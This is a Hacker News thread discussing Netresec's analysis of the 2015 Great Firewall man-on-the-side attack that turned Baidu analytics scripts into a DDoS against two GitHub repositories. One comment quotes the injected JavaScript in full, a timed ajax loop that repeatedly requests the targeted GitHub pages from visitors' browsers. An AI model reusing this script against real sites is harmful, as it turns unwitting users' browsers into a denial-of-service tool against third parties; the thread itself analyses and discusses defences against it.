
China's Man-On-the-Side Attack on GitHub - netresec
http://www.netresec.com/?page=Blog&month=2015-03&post=China%27s-Man-on-the-Side-Attack-on-GitHub
======
JohnTHaller
Since the question of "why" and "how" is coming up again, here's a quick
summary I posted on reddit:

From a few different analysis on HN and elsewhere... Baidu has an analytics
product and an ads product, much like Google Analytics and Google AdSense,
which are used on all kinds of websites via Javascript. China has set the
Great Firewall of China to modify some of Baidu's assets so that any non-
Chinese IP gets a modified version of the Baidu analytics and ad code. The
modification causes every web browser visiting a Chinese site using a Baidu
analytics/ad product to load files from the greatfire and cn-nytimes projects
on github (both of which are designed to circumvent Chinese government
censorship) once every 2 seconds. The effect is that people all over the world
outside of China are unwilling participants in a DDoS against github.

github has responded by taking both projects offline and replacing their
content with a simple Javascript alert that shows a "WARNING: malicious
javascript detected on this domain" messagebox. This causes the folks visiting
baidu-infected sites to see the alert and know something is wrong with the
website (hopefully not visiting it again). It also prevents the malicious
Javascript from executing in a loop and reloading the site every 2 seconds.

One takeaway is that you should always have a backup of your code and
resources outside a single central site like github. Another is that you
should never ever have any webpage configured to load any resources from a
server hosted within China IP address space as it is vulnerable to this sort
of attack by the Chinese government.

~~~
ma2rten
actually both projects are still online on github.

[https://github.com/cn-nytimes](https://github.com/cn-nytimes)

[https://github.com/greatfire](https://github.com/greatfire)

~~~
rattray
They are _back_ on github now; they were indeed temporarily changed to return
only

    
    
        alert("WARNING: malicious javascript detected on this domain");
    

(or something similar). I saw this myself.

~~~
valgaze
From the Sony pictures incident to the attack on that satirical magazine in
Paris to this, it's getting pretty tiresome having to deal with authoritarian
types who believe they should dictate what other people can say or access.

For those curious, see below for a write up of the malicious javascript (uses
a simple ajax call & random number timer): [http://insight-
labs.org/?p=1682](http://insight-labs.org/?p=1682)

document.write("<script
src="[http://libs.baidu.com/jquery/2.0.0/jquery.min.js">](http://libs.baidu.com/jquery/2.0.0/jquery.min.js">)
\x3c/script>"); !window.jQuery && document.write("<script
src='[http://code.jquery.com/jquery-
latest.js'>\x3c/script>");](http://code.jquery.com/jquery-
latest.js'>\\x3c/script>"\);)

startime = (new Date).getTime();

var count = 0;

function unixtime() { var a = new Date; return Date.UTC(a.getFullYear(),
a.getMonth(), a.getDay(), a.getHours(), a.getMinutes(), a.getSeconds()) / 1E3
}

url_array =
["[https://github.com/greatfire/"](https://github.com/greatfire/"),
"[https://github.com/cn-nytimes/"];](https://github.com/cn-nytimes/"\];)

NUM = url_array.length;

function r_send2() { var a = unixtime() % NUM; get(url_array[a]) }

function get(a) { var b; $.ajax({ url: a, dataType: "script", timeout: 1E4,
cache: !0, beforeSend: function() { requestTime = (new Date).getTime() },
complete: function() { responseTime = (new Date).getTime(); b =
Math.floor(responseTime - requestTime); 3E5 > responseTime - startime &&
(r_send(b), count += 1) } }) }

function r_send(a) { setTimeout("r_send2()", a) } setTimeout("r_send2()",
2E3);

~~~
rmchugh
Loading all of jQuery seems a little bit excessive when the only thing they're
using is the $.ajax function.
[http://youmightnotneedjquery.com/#request](http://youmightnotneedjquery.com/#request)

~~~
interdrift
On which side are you ._.

~~~
tomjen3
Engineers don't care what side anybody is on, as long as the tech works.

~~~
hobs
Really?

We knew the world would not be the same. A few people laughed, a few people
cried, most people were silent. I remembered the line from the Hindu
scripture, the Bhagavad-Gita... "Now, I am become Death, the destroyer of
worlds."

Any engineer worth his salt absolutely understands the consequences of their
actions on the world. Sometimes they understand a bit too late.

~~~
jc4p
hey buddy

~~~
hobs
What's up pvam

------
westiseast
For me the most interesting thig about this incident is how the GFW is being
used offensively. Most other governments so far have protested online
censorship from a kind of moral standpoint, but not from a security standpoint
per se. Now it's quite clear the GFW is being leveraged offensively - did
anyone spot this capability previously?

~~~
Laforet
It only really ramped up this year.

[http://furbo.org/2015/01/22/fear-china/](http://furbo.org/2015/01/22/fear-
china/)

~~~
westiseast
Don't know why your comment has been voted down, that's an interesting link
and blog post and totally relevant to this thread :\

~~~
hkon
Don't underestimate the chinese capability to down vote

------
mraison
I still don't really get it. What's the actual goal behind the attack? When
the Chinese government decides to block a website, I can at least understand
their motivations, as bad as they may be. But DDOSing Github just seems to be
pissing the whole world off for a few hours without any actual long term
consequences.

~~~
j42
Actually, someone here (who I cannot remember) said quite eloquently yesterday
that our biggest export--and "influence" on the world--is culture.

For the first time I realized that pissing people off may, in fact be the
objective as the other reply stated.

China and Russia are both (quite unique) examples of countries with an
unfathomable degree of control over their citizens. It can be hard to grasp
occasionally, coming from a western mindset but for the vast majority within
said countries, the _entire_ reality they see and what they believe to be true
is heavily distorted--in that, it is defined by the vision of the oligarchy
and information is carefully controlled to produce a desired set of beliefs.
North Korea is an extreme caricature of this pattern.

Technology is naturally subversive to this as it lets people interact directly
with other cultures and ideologies which may provide contrasting philosophies
and--terrifyingly--the opportunity for free thought.

Restrict access to technology and you'll have a revolution. Instead, you
become the "troll," or the "problem," and quietly become isolated from large
areas of the network, all while reducing the amount of information you have to
sift through before passing it along to the populace, in the name of security.

And while the effect on actual traffic may be minimal, it does make for a very
cold perception which generally makes cross-cultural integration unlikely. How
many western consumer-technology companies do you see integrating with Asia-
based API's/demand, compared to other industry, let alone academics?

~~~
karcass
> the entire reality they see and what they believe to be true is heavily
> distorted--in that, it is defined by the vision of the oligarchy and
> information is carefully controlled to produce a desired set of beliefs.

That's pretty much how I feel about the Fox-watching population of the US.

~~~
carboncopy
> That's pretty much how I feel about the Fox-watching population of the US.

I used to think the same thing, and to some degree I think it holds truth. But
after spending lots of time with my right-wing family, I think it's a bit more
nuanced than that. Most avid Fox News watchers I've met fail to embrace the
entire world-view or vision promoted on the channel, and share maybe 60-70% of
the opinions elicited toward viewers. I know, it's just one data point, but I
don't have a study handy.

~~~
troels
I think it's generally safe to assume that a large chunk of people who happen
to hold opinions you disagree with don't hold them because they are retarded.
Even Fox News viewers.

------
cxseven
Netresec should be able to gradually increase the TTL of their packets going
to Baidu to see which hop or link is doing the hijack.

They mention someone did this earlier with the iCloud hijack by using mtr and
tcptraceroute, but it looks like these tools won't work as-is this time
because the Github man-on-the-side attack waits for the HTTP GET request. It's
probably stateless and if so could be triggered by a lone ACK with a proper
HTTP GET inside. As long as they're not behind a stateful firewall, replaying
their ACK at various TTLs to find the smallest TTL that triggers the hijack
would probably do the trick.

If the hijackers are clever they could make it look like the compromised hop
is further away than it actually is, but not closer. Even so, this could be
useful information and I'd love to see the result if anyone tries it.

Edit: changed trace method so that it'd actually work.

~~~
jackdawjack
I think this might be a daft question, but why can't they inject packets with
a (roughly) appropriate TTL for the current sequence that they're hijacking?
From the two examples shown one might think they're picking ttl's more
randomly

~~~
cxseven
They could make the packets stand out less, but there'd still be the
overlapping reply from the legitimate Baidu host, unless the attackers went
full MITM.

In case anyone is confused: we're now talking about the TTL of the packets
coming from hijackers, whereas I was originally talking about the TTL of the
packets going towards Baidu and the hijackers. The TTL the hijackers send
won't affect the tracing method I was suggesting.

------
riscy
"Our analysis shows that only about 1% of the requests for the Baidu Analytics
script are receiving the malicious javascript as response. So in 99% of the
cases everything behaves just like normal."

The way I see it, this has been a diagnostic test by the Chinese government,
ensuring they have the power to globally take down any website (or servers)
they please.

~~~
allochthon
Possibly. But whoever's behind it end up looking kind of bad, since Github has
not capitulated.

~~~
coldcode
But if it were 100% would github be able to survive?

------
Rogerh91
Github should have a huge call-to-action banner for every China-based web
visitor that leads to this article translated into Mandarin.

Xi Jinping Millionaire Relations Reveal Fortunes of Elite

[http://www.bloomberg.com/news/articles/2012-06-29/xi-
jinping...](http://www.bloomberg.com/news/articles/2012-06-29/xi-jinping-
millionaire-relations-reveal-fortunes-of-elite)

Maybe add a Trollface gif while they're at it.

~~~
stingraycharles
... which is probably blocked for every China-based web visitor anyway.

~~~
Rogerh91
I should clarify: I don't think Github should link to the article directly
(which is banned since Bloomberg has been banned ever since they published
that article)

A plain-text mandarin version in a repo somewhere would suffice to challenge
the Chinese government's perception on what it really takes to censor the
Internet. I honestly think it would just highlight how much they're losing
against an organization of 300.

Failing that, I'm going to resort to my default plan of finding the best way
to donate money and time to help support Github, but I thought it was an idea
worth entertaining.

------
tn13
Our government is using our own money to spy and undermine our tech companies.
What exactly is it doing to ensure American companies are defended ?
Protecting us from international thugs like China's Communisty Party is the
primary duty of our government.

~~~
themartorana
"... _should_ be the primary duty of our government."

Fixed it?

Although it's interesting to think about. Actual government retaliation
would/could be seen as war provocation, especially if China holds on to any
plausible deniability. Cyber warfare is currently very hard to prove, but even
harder to hold accountable for. Even with DPRK, and our little shut-down-
the-"internet" quiet retaliation thing that happened a few months back, North
Korea still disavows responsibility. I imagine holding China actually
responsible (in the way where it is recognized and acknowledged in the
international community) is almost impossible... And thus we would be seen as
the aggressors.

~~~
madez
A government doesn't have to react offensive against threats. It's also
possible to provide defensive measures. In this specific case it could provide
infrastructure, computing resources and personal to fend off the attack.

~~~
Zancarius
Actually, that would be interesting...

Passing some sort of funding bill for the defense of US companies against DDoS
attacks might be the only immediate option that could be done on a short time
frame. Otherwise, it could (potentially) be something like the government
holding on to spare capacity in some way/shape/form that it leases to affected
companies for a very low rate.

As we move on further into the 21st century, I can't see this as something
that's going to go away. We definitely need to plan ahead.

------
rsuelzer
If anyone from GitHub is reading this, I know that many of us would like to
help. I imagine that the mitigation of this attack has been very costly. Is
there a place we can donate to help offset the cost of this attack? Maybe I
will purchase a subscription, but a one time payment would be preferable for
many of us.

~~~
toong
The've raised $100M from a16z about two years ago [1] ? They should be fine
without your donation.

[1]
[https://news.ycombinator.com/item?id=4220353](https://news.ycombinator.com/item?id=4220353)

------
rufugee
If Baidu served everything over https, would that effectively make this attack
impossible unless the China GFW mitm'd the connections? I suppose that might
add a significant server load to Baidu, but I wonder if we should just start
accepting SSL as a cost of doing business on the internet.

Of course, that would require Baidu's cooperation, and I suppose they might
now want to raise the ire of the Chinese government. Also, I suppose the
government could just use their own heavily trafficked sites to do this, but
that should isolate it somewhat to Chinese IP ranges.

~~~
akfanta
> that would require Baidu's cooperation

Don't count on that. Baidu is part of the Chinese government gang. It is
notorious for censoring/altering search results both for political and
commercial reasons. I wouldn't be surprised if they were notified about this
beforehand.

------
rwhitman
So assuming that the Chinese government weaponized their firewall, the
question is why are they using it in such a transparent way?

Github is pretty firmly in the camp of open information, and used by nearly
every web software engineer in the world. Surely they're not going to succeed
at censoring these projects. As an attempt to project power and send some sort
of warning, something about it just seems like a pretty flawed strategy.

~~~
allochthon
> As an attempt to project power and send some sort of warning, something
> about it just seems like a pretty flawed strategy.

I've been wondering about that myself. Perhaps the lesson to be taken away by
most is that if you're not Github, you might not be able to effectively
counter such an attack. That could lead to self-censorship.

------
Aissen
One thing I don't understand: when you have the infrastructure to run the
Great Firewall, why not simply generate the traffic yourself ? At this point
you might just fake traffic from inside China with any kind of amplifiable no-
state protocol.

Sure, the TCP/HTTP attack might be a bit more resource intensive, but it
should be doable with the same capabilities provided by their DPI
infrastructure, no ?

 _Edit_ : Last but not least, if we are sure that this attack is indeed coming
from the GFW, then why Obama isn't calling Xi Jinping right now ?

~~~
shawabawa3
> why not simply generate the traffic yourself ?

Couldn't github simply null-route all chinese-origin traffic in that case?

Currently the DDoS comes from everywhere _except_ china

~~~
adaml_623
The point of this DDoS attack is to prevent people in China from accessing
content on github. To null-route chinese-origin traffic would mean that the
attackers win.

(Obviously VPNs could be used to circumvent this null-route but they then
become vulnerable to the same attack)

~~~
shawabawa3
> The point of this DDoS attack is to prevent people in China from accessing
> content on github. To null-route chinese-origin traffic would mean that the
> attackers win.

China already has the capability to block people in china accessing github
(and I assume it does)

------
liugiul
So, fuck that. The Chinese gov are bullies, but now they're treading on my
lawn (or the lawn where I host my things, and all other things of
interest/importance).

What can I do? I already block ad tracking code in my browser with µblock. Can
I send an email to some English-speaking representative of the communist party
telling them to fuck off, and that I'll make sure to chose things not Made in
China from now on?

~~~
mariojv
Ghostery blocks most analytics trackers:
[https://www.ghostery.com/en/](https://www.ghostery.com/en/)

Google Analytics is blocked with that, I'd imagine Baidu Analytics would be
blocked too. You can configure it to block / not block individual pieces.

------
Hexcles
FYI, the referer (or referrer, whatever) method might not work well.

The hijacked code does reside on only a few Baidu domains, but it is used
(included by <script> tag) by TONS OF Chinese websites. The code is running in
these numerous pages which use Baidu products, not just in Baidu pages. Thus,
the referer actually varies a lot.

It is really a cleverer solution to notice the subtle difference of the
trailing slash.

------
djent
DDOS seems to be impacting me intermittently here in Rhode Island
[https://imgur.com/pW59MG3](https://imgur.com/pW59MG3)

~~~
samlambert
Hi Djent,

Would you mind sending an email to support@github.com with details on what you
were doing when that happened?

Thanks

~~~
dlgeek
It's happening for me constantly - just clicking the link from the discussion
- I get a (very) slow page load, then the unicorn page. I'm assuming it's a
timeout on the backend.

~~~
Rapzid
Last night same for me, browsing the Azure Kuda repo.

------
e79
I wonder how GitHub mitigated the attack so successfully. I can't find any
baidu scripts using the injected code anymore (in fact the original tracking
scripts on baidu's own domain return nothing), and GitHub is now serving the
two repos that were originally targeted.

What happened? Whatever it is, I'm glad they were able to mitigate the
attacks.

~~~
clippit
The injection has been stopped and Baidu's script checks if there exists a
referer.

~~~
zaroth
What do you mean "has been" stopped? There's no definitively stopping this
without HTTPS, which I'm pretty sure hasn't magically "happened" in China in
the last couple days.

The GFW may have ceased its attack, but there's no check you can possibly add
into an asset delivered over HTTP which can't be undone by the GFW.

As long as there's a script being delivered over HTTP, the GFW can intercept
that script request and replace with a script of its own.

~~~
clippit
I mean the Javascript hijacking has been stopped. This DDoS mixes several ways
and during the js hijacking period, GitHub returns `alert()` on specific url
for blocking browsers sending ajax requests. For now, the infected urls are
back to normal.

------
bentcorner
Can I black-hole all of China in my hosts file? Off the top of my head I'm not
going to miss anything, and I'd hate to be an unwitting participant in future
attacks.

~~~
jacquesm
[http://www.ipdeny.com/ipblocks/data/countries/cn.zone](http://www.ipdeny.com/ipblocks/data/countries/cn.zone)

------
mwsherman
Can browsers or OSs not treat the corrupted Baidu analytics as malware?

~~~
peteretep
You'd think, wouldn't you. Or instead simply blacklist Baidu's analytics code
completely. That will only hurt Chinese businesses using Baidu's product, and
no-one else.

~~~
TheDong
It would also hurt american, or european, or any nationality of business that
uses baidu to get more insight into chinese visitors.

Baidu is certainly most popular within china, but not exclusive to them.

~~~
teknologist
Google Analytics does all that, no worries

~~~
kuschku
Google Analytics is, sometimes, blocked by the GFW – so, if you already sell
out your users to Google, using Baidu wouldn’t be an unrealistic use case
anymore.

~~~
teknologist
Except when it decides to ddos github

------
dendory
If the attack happens as described, and those two repos are aimed at Chinese
people, why doesn't Github just block all requests to those pages that come
from outside China?

~~~
mkesper
That would be suicide for fear of death.

------
jjcc
Most people might not know what kind of organization GreatFire really is
because too much context is missing. I only discovered recently it's not so
simple. There have been a lot of talks about the behavior of GreatFire for
quite for a while but most of the talks are in Chinese. There are some in
English though, to give everybody a glimpse here is an example:
[https://github.com/greatfire/wiki/issues/1](https://github.com/greatfire/wiki/issues/1)

I have an impression is GreatFire tried to weaponize all the users of github.
They succeeded.

I don't like the GFW either. But I think I'm very likely to be downvoted
because the context of this incident is quite complicated. It's not easy to
tell the truth especially when it's against most people's belief.

~~~
carboncopy
Thanks for providing context. It might be unfair to thrust GitHub, and all
Chinese developers into this fight. The Chinese government— if the DDoS fails
— may very well just block access to Github, developer needs be damned.

Of course that would provide an opportunity for a Chinese counterpart of
Github to take market share, perhaps a favorable outcome?

~~~
ttflee
Many of us Chinese developers have already equipped with VPNs and tunnels as a
daily productivity tool. It seems that the purpose of the gov'nt is to block
access from less tech-savvy users, which greatfire and nytimes-cn provide.

------
songco
In china, there's lots of similar thing, e.g. your android phone download a
app from some site, the ISP(or others in your network path) can detect
this(maybe by url) and return a modified version(e.g. add it's own ad or maybe
complete a competitor's product of the original app).

------
bsder
So, the real question is how should _we_ , the tech community, react?

~~~
mike_hearn
More SSL.

This attack works because the firewall is capable of reading plain HTTP
requests to spot the ones that are requesting the target javascripts, and then
statelessly injecting raced packets. Neither technique works when SSL is in
use. Even if China simply demanded the SSL keys from Baidu, they'd have to
decrypt every single connection on the fly and significantly upgrade their
infrastructure.

I think the only way to continue this technique in the presence of widespread
SSL use is to actually force Baidu to insert the malicious Javascript on their
own servers.

~~~
cbsmith
> Even if China simply demanded the SSL keys from Baidu, they'd have to
> decrypt every single connection on the fly and significantly upgrade their
> infrastructure.

Umm... not really. All you'd have to do is select whatever subset of
connections you want to inject code in to, and then terminate them with your
own web server that has Baidu's SSL keys, then let the rest of the connections
go through transparently to Baidu.

~~~
mike_hearn
You can't easily select that unless the stuff you want is on a dedicated
relatively low traffic hostname. If everything is served off e.g. ads.baidu.cn
then you have to decrypt _all_ ad traffic, which is a lot.

~~~
cbsmith
You can select a random subset very easily at the layer-3/4 level. It's really
not that different from just adding a host behind a layer-4 load balancer.

...and actually it doesn't have to be completely random. You could select
specific IP addresses to intercept.

------
pilgrim689
This is a really well article outlining how the man-on-the-side attack on
Baidu is carried out. The only flaw here is the logical leap that goes from
"Baidu is being hijacked" to "Baidu is being hijacked by the Chinese
government"

~~~
wnoise
The attack is not on Baidu, but via Baidu.

Whoever is the attacker appears to control the great firewall of China. Who
else would that be but the Chinese government?

~~~
imron
The Honker Union
[http://en.wikipedia.org/wiki/Honker_Union](http://en.wikipedia.org/wiki/Honker_Union)
and/or the Red Hacker Alliance
[http://en.wikipedia.org/wiki/Red_Hacker_Alliance](http://en.wikipedia.org/wiki/Red_Hacker_Alliance)

~~~
josefresco
The line seems to be blurry - as I'm sure it is around the world when it comes
to state level "hacking".

[http://en.wikipedia.org/wiki/Honker_Union#Relationship_with_...](http://en.wikipedia.org/wiki/Honker_Union#Relationship_with_Chinese_government)

~~~
imron
Sure, but the Chinese government has far more sophisticated ways of taking
down sites so their own citizens can't access them, and they're not afraid to
use them - even against big name sites. And in fact they often do, to help
local companies providing the same offerings to prosper.

The current DDoS attack just strikes me as too crude a method when they have
so many other options available.

If you were going to argue that it's just a retaliation towards GitHub for
hosting these projects, then once again there are others sites the government
is far more concerned about and they could use DDoS to bring them down with
far less publicity than what the GitHub DDoS is generating.

It just doesn't seem to make sense from either the method being used or the
motivation behind the attacks.

------
mingodad
Can the browser/os have an alert for such kind of behavior ? I mean if a
script/program is sending repeated/too many requests stop/slow/show users a
message ? Like when some javascript scripts is using too much cpu the browsers
actually inform the user if he/she wants to stop then ?

------
datashovel
This might not be a feasible reaction to the attacks, but in my mind the
people who are "unsuspecting attackers" aren't necessarily trying to access
GitHub in the first place.

So, what if they set up automated rule to block all IPs (for a period of time)
who show traffic patterns that indicate they are part of the attack, and then
for all those IPs who are trying to reach GitHub purposefully but are
currently blocked, give them explicit instructions on how to tunnel to regain
access to GitHub while the attack continues. This way only those who are (a)
part of the attack, and (b) want to access resources on GitHub need to do
anything special.

My guess is the number who would truly be affected by this are a tiny fraction
of the total number of people who are part of the attack.

------
misiti3780
i read that github contains content that the Chinese do not like and that is
why this is happening - what is the content they are so pissed about ?

~~~
jewbacca
[https://github.com/cn-nytimes/](https://github.com/cn-nytimes/) and
[https://github.com/greatfire/](https://github.com/greatfire/) host
information about and software for circumventing the Chinese government's
internet censorship systems -- which, among many other things, blocks access
to, eg, Google, and The New York Times.

Apparently they (the Chinese government) are not willing to entirely block
Github traffic in the same way (presumably as an important tool for their
software industry as well). This DDoS is an attempt to punish Github for not
removing this block-circumventing information, and force the inaccessibility
of those 2 repos specifically. It is being conducted in such a way that this
is readily obvious but plausibly deniable.

~~~
grandalf
> information about and software for circumventing the Chinese government's
> internet censorship systems -- which, among many other things, blocks access
> to, eg, Google, and The New York Times.

The actual impact of the attack was to have thousands of news outlets and
discussion forum sites mention and link to the github repos that offer
circumvention.

Further, by attacking Github, it's guaranteed that many of the most tech-savvy
Chinese internet users will have the existance of the forbidden repos launched
into their consciousness.

Of course the Chinese government knows this and was likely not responsible for
the attack.

The attack would not be possible to commit by the actual perpetrator if there
weren't such a knee-jerk bias against the Chinese government's internet
censorship.

Let it also be noted that the US Government censors lots of information too,
both through so-called "official secrets" requiring security clearance granted
by party members, and via laws that crack down on things deemed morally wrong,
as well as illicit drugs.

~~~
tjradcliffe
> Of course the Chinese government knows this and was likely not responsible
> for the attack.

This is an example of the logical fallacy of "argumentum ad stultum", or
"appeal to stupidty".

It goes like this:

\- X would be stupid. \- No one would ever do anything stupid. : Therefore no
one would ever do X.

There are so many counter-examples to this argument that they hardly bear
mentioning. People do stupid things every day of the week and twice on
Sundays. Organizations multiply stupidity as often as they moderate it.

It may be that this wasn't the Chinese government, but pointing out that it
would be stupid for them to do so is not an argument against it at all.

~~~
grandalf
> People do stupid things every day of the week and twice on Sundays.

While you are correct in pointing out the logical fallacy, there have been
several examples of highly likely false-flag cyber attacks lately. The Sony
hack is another example, the result of which was the exact opposite of what
the state actor alleged to have done the attack wanted.

"Cyber attacks" are a great platform for false flag attacks because it's easy
to obtain servers or DDOS drones in any country.

I'd say a good indicator of strategy like this going on is when a defacing
attack is accompanied by targeted data breach. Chances are the data breach was
the goal, and the defacing the smoke screen.

Many HN readers could stage a cyber attack that would be initially linked to
North Korea or China with a few hours of reading/research.

------
dante9999
how is it possible that someone can carry this kind of attack without facing
any kind of legal consequences? I know they are china we're not going to start
a war with them but shit is there really no legal authority here?

------
geetee
This is some terrible JavaScript. And jQuery?

~~~
interdrift
It's obfuscated.

~~~
baudtack
Even un-obfuscated it's pretty gross.

------
taternuts
Does baidu have any say in this at all? Were they hacked to include this
script or they just passively allowed it?

~~~
corford
Baidu have not been hacked. Their servers reside inside the great firewall
meaning any request from outside China has to traverse the GFW before arriving
at Baidu's servers. During traversal of the GFW, the Chinese gov is modifying
the Baidu server response with malicious javascript.

Baidu has no say in the matter. They could try and help Github by swapping to
only serving their analytics scripts over HTTPS. Even then, this would only
help once a large majority of existing websites that use Baidu analytics have
updated their website code to point to the HTTPS URL. Until then the attack
would probably still continue to work.

~~~
johnbellone
It sounds like to me despite Baidu not being involved they are being used as a
vector of attack. It seems reasonable for anyone using Baidu to find an
alternative for all of their services. After seeing that China is modifying
responses how can we trust any request that goes past the GFW?

~~~
kbart
"It seems reasonable for anyone using Baidu to find an alternative for all of
their services."

As always, majority of them simply don't care. Did many people stopped using
Google after Snowden's leak on this side of GFW?

------
jmngomes
"Based on reports we've received, we believe the intent of this attack is to
convince us to remove a specific class of content."

Does anyone know what that "specific class of content" is, or can shed some
light over the motivation of the attacks?

~~~
codesuela
> As can be seen in the code, the two targeted URLs are github.com/greatfire
> and github.com/cn-nytimes, which are mirror sites for GreatFire.org and the
> Chinese New York Times. GreatFire and NYT both use GitHub to circumvent the
> online censorship performed by the Great Firewall of China (GFW).

~~~
jmngomes
I read that. Can someone shed some light over the motivation of the attacks?

~~~
madez
Defending against an DoS-attack costs money. People try to spend as few money
as possible.

So, the theory is that the attacker wants github to take the repos down by
making it costly to not do so.

------
xenophonf
I wonder why TCP implementations don't monitor mid-stream changes to things
like packet TTLs and optionally drop the connections as a result, or rather, I
wonder what would break if they did something like that.

------
quarterto
I was under the impression that the attack had evolved since this tactic. Is
there any word on what the current attack looks like? Or is it still this?

------
simple123
Please modify your hosts file, so you will not be a unwilling participants of
GFW of China in the future!

for example in windows:

127.0.0.1 libs.baidu.com

127.0.0.1 hm.baidu.com

other chinese GFW attack host

....

------
OneTwoFee
Are there any tools that would allow me to detect this kind of attack on my
computer? I'd prefer not to DoS github.

------
simple123
If Great Firewall of China could modify the javascript, is it possible for
U.S. to change it to a non-harmful script?

------
est
Well, that's a good analysis article and a good promotion for CapLoader.

Wireshark indeed can do better on Gantt charts and graphs

------
dav43
Could this be prevented by stricter CSP server-side?

------
arasmussen
> China's Man-on-the-Side Attack on GitHub > and can conclude that China is
> using their active and passive network infrastructure

China is a country that has 1.35B people in it. I guarantee you that 99.9% of
those people had nothing to do with this attack. Can we stop using "China" and
be more specific? It feels like it's blaming innocent people and possibly an
entire innocent country.

Chinese attackers? The Chinese government? People outside China who hacked
Chinese internet infrastructure? At this point can we even be certain who
specifically is to blame?

~~~
EC1
Nobody is sitting here equating the word "China" with the entirety of the
Chinese people.

